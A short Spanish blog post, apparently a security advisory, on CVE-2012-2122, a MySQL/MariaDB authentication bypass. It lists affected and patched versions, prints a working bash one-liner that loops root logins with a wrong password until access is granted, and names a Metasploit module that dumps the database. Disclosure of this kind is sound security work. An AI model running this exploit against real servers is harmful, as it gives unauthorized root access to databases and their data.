Grave Vulnerabilidad en MySQL/MariaDB (Autenticación sin Password)

Se ha encontrado un Grave bug en MySQL & MariaDB que permite a un atacante evadir la autenticación de la base de datos.

La vulnerabilidad (CVE-2012-2122) afecta a las siguientes versiones:

• MariaDB y MySQL hasta la 5.1.61, 5.2.11, 5.3.5 y 5.5.22

NO SON vulnerables las versiones:

• MySQL 5.1.63, 5.5.24 y 5.6.6
• MariaDB 5.1.62, 5.2.12, 5.3.6 y 5.5.23

El "exploit" de este bug es simplemente realizar conexiones simultáneas, con cualquier password introducida como parámetro y contra un servidor vulnerable, obteniendo así máximos privilegios (root).

Simplemente con esta linea en bash obtendremos acceso al servidor MySQL:

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Para los amantes de MSF, ya existe un módulo (mysql_authbypass_hashdump) que explota este bug para dumpear toda la base de datos:

Lamento no poder explicar más sobre el bug, pero dejo buenas referencias:

• http://seclists.org/
• https://community.rapid7.com/
• http://thehackernews.com/
• http://www.hackplayers.com/(español)
• http://www.securitybydefault.com/(español)

[+] Salu2
[+] Zion3R

Author & Editor

Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.